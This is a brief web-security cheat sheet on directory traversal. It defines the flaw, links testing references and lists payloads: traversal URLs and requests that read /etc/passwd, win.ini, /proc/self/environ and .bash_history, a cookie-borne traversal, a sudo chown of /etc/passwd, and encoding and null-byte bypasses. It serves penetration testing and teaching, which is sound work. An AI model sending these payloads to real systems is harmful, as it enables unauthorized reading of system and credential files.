Directory Traversal

A directory traversal (or path traversal) consists in exploiting insufficient security validation / sanitization of user-supplied input file names, such that characters representing “traverse to parent directory” are passed through to the file APIs.

Directory traversal is a subset of Local File Inclusion (LFI). See difference.

• Testing Directory Traversal/File Include (WSTG-ATHZ-01)
• Root-me – Web Server – Directory Traversal (Protected)
• Directory traversal attack (Wikipedia)

Examples

Windows

http://someurl.com?filename=..\..\..\windows\win.ini

c:\boot.ini
c:\windows\system32\drivers\etc\hosts
C:\xampp\apache\.htpasswd

Unix

http://someurl.com/../../../../etc/passwd

In HTTP GET request

GET /static/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1

Get environment variables of the current process

http://someurl.com/../../../../proc/self/environ
http://someurl.com/image?id=../proc/self/environ

Operating system details of the victim

http://someurl.com/../../../../proc/version

Current user

http://someurl.com/../../../../proc/self/version

Other info, like processes running

http://someurl.com/../../../../proc/sched_debug

Command history

http://someurl.com/../../../../home/<userid>/.bash_history
http://someurl.com/../../../../home/apache/.bash_history

In cookies

GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd

In sudo

sudo chown baduser /opt/myapp/myconfig/../../../etc/passwd)

Bypass

URI encoded

%2e%2e%2f which translates to ../
%2e%2e/ which translates to ../
..%2f which translates to ../
%2e%2e%5c which translates to ..\

Validation on start of path

The application expects the filename to start with the base folder, such as /var/www/images.

filename=/var/www/images/../../../etc/passwd

File extension is validated

The application expects the filename to end with a specific file extension (e.g. “.png”). Try the null byte.

filename=../../../etc/passwd%00.png